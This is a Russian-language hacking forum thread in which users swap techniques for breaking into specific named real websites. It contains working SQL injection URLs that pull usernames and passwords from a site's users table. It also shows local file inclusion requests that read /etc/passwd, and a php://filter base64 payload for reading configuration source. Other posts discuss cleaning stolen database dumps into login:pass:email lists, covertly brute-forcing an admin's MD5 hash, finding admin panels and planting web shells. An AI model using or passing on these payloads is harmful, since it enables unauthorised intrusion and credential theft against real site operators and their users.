http://www.aawow.info/question2.php?id=-31+union+select+concat(name,0x20,pass)+from+0x7573 657273


_http://www.aawow.info/question2.php?id=-31+union+select+concat_ws(0x3a,id,name,pass)+from+ aawowinf_mrlink.users

в таблице users оказалисьнесколько интересных записей: name, pass

Делаю запрос:
http://www.aawow.info/question2.php?id=-31+union+select+concat(name,0x20,pass)+from+0x7573 657273

Пробовал переводить в хекс и нэйм и пасс, ничего хорошего не выходит...
Пипец фрукт, ты читать когда пойдешь? БД глянь в которой находится таблица, вероятно, что таблица users не находится в текущей БД... по поводу перевода в хекс промолчу пожалуй...
Если не ошибаюсь то надо не table_name а table_schema
Ошибаешься.

Ребят, можно ли что либо с этим сделать или из этого нельзя извлечь выгоду?
_http://mysql.infobox.ru/server_databases.php
_http://mysql.infobox.ru/

http://www.allthat.nm.ru/107.htm

помимо хss и инклудов че ещё тут актуально?

http://www.allthat.nm.ru/107.htm

помимо хss и инклудов че ещё тут актуально?
Похоже на рекламу inattack.ru :o

Ребят, можно ли что либо с этим сделать или из этого нельзя извлечь выгоду?
_http://mysql.infobox.ru/server_databases.php
_http://mysql.infobox.ru/

Кроме раскрытия путей и где находится phpMyAdmin, ничего.

нах мне вашу рекламу,нашлись тут борцы с промоутингом...мне ответ нужен.

a koqda admin panel na sayte takoy http://www.scaa.us/admin a 4to zdelat??a[I]

2LokbatanLi искать какуюнить читалку файлов, т.к. пасс почти всегда храниться в файле.

Вот например есть инклуд

http://www.route66.com.ua/index.php?c=/etc/passwd

когда пытаюсь прочитать какойнить файл с диры сайта например

http://www.route66.com.ua/index.php?c=config.php

то сурсов его невижу, почему он делает так а неиначе и есть ли способ это обойти?

Может кто сталкивался- после дампа базы нужно сделать выборку только определенных столбцов и таблиц. Например, нужны login:pass:email или только login:pass Замучился чистить руками от мусора- id и т.п. Что используете для этого?

регулярные выражения или phpmyadmin+sql-запрос

phpmyadmin
До него ещё добраться надо.
регулярные выражения
Нет никакого скриптика?

то сурсов его невижу, почему он делает так а неиначе и есть ли способ это обойти?
если контролируется начало значения, которое попадает в include(), то возможно:
php://filter/read/resource=script.php

Нет никакого скриптика?
нет и по идее быть не может универсального, кроме как для хешей и емайлов

2Komyak
через шелл сделал запрос к базе сохранил ответ в хтмл а там чиститься очень легко!

2 Komyak

Если у тебя есть дамп, то проще всего я думаю сделать выборку на своей машине. Ставь наборчик типа "Денвер" заливай дамп в базу. А потом делай выборку вроде "select concat(login,':',pass,':',email) from userz into outfile 'c:\damp.txt' " все сольется в файл.

2LokbatanLi искать какуюнить читалку файлов, т.к. пасс почти всегда храниться в файле.

Вот например есть инклуд

http://www.route66.com.ua/index.php?c=/etc/passwd

когда пытаюсь прочитать какойнить файл с диры сайта например

http://www.route66.com.ua/index.php?c=config.php

то сурсов его невижу, почему он делает так а неиначе и есть ли способ это обойти?


просто там нету этого файла , поэтому он тебе не выдает ни чего

ЗЫ там вообще RFI (((жаль токо отключена функция allow_url_include

просто там нету этого файла , поэтому он тебе не выдает ни чего

ЗЫ там вообще RFI (((жаль токо отключена функция allow_url_include
Там есть файл, но это ИНКЛЮД, а не читалка файлов!

']если контролируется начало значения, которое попадает в include(), то возможно:
php://filter/read/resource=script.php

Нифига, так ты файл только выполнишь, а читать надо так:

http://localhost/1.php?a=php://filter/convert.base64-encode/resource=1.php

А потом декодить :)

есть дед. win xp sp3.
нужна прога каторая брутит md5 хэш админа vbuliten в скрытом режиме и сохраняет пасс в файл

Помогите найти админку
http://paulspest.com
перепробовал кучу вариантов, но так и не нашёл. Раньше там стояла Joomla, а сейчас хрен поймёшь. Есть авторизация через сторонний сервис, но такой подход не устраивает.

И "не отходя от кассы"- в этой теме http://forum.antichat.ru/thread137853.html прозвучала фраза про папку темп. Т.е. если я в корень хостинга залью в папку шелл (а на многих хостах это не проблема), то могу действовать от имени root?
Не пинайте если глупость сморозил.

И "не отходя от кассы"- в этой теме http://forum.antichat.ru/thread137853.html прозвучала фраза про папку темп. Т.е. если я в корень хостинга залью в папку шелл (а на многих хостах это не проблема), то могу действовать от имени root?
Не пинайте если глупость сморозил.

Нет

есть дед. win xp sp3.
нужна прога каторая брутит md5 хэш админа vbuliten в скрытом режиме и сохраняет пасс в файл
в PasswordsPro нажми Ctrl+Alt+H